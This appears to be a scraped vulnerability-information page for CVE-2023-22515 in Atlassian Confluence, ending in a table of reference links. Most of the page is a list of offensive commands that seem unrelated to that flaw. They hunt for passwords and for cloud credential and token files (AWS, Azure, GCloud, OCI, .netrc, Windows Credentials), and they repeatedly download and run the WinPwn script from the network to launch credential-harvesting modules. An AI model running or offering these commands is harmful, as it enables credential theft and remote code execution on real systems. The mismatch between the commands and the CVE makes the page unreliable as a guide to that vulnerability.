findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-22515 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/175225/Atlassian-Confluence-Unauthenticated-Remote-Code-Execution.html |
| confluence.atlassian.com |
GitHub CVE
|
https://confluence.atlassian.com/display/KB/FAQ+for+CVE-2023-22515 |
| confluence.atlassian.com |
GitHub CVE
|
https://confluence.atlassian.com/pages/viewpage.action?pageId=1295682276 |
| jira.atlassian.com |
GitHub CVE
|
https://jira.atlassian.com/browse/CONFSERVER-92475 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-22515 |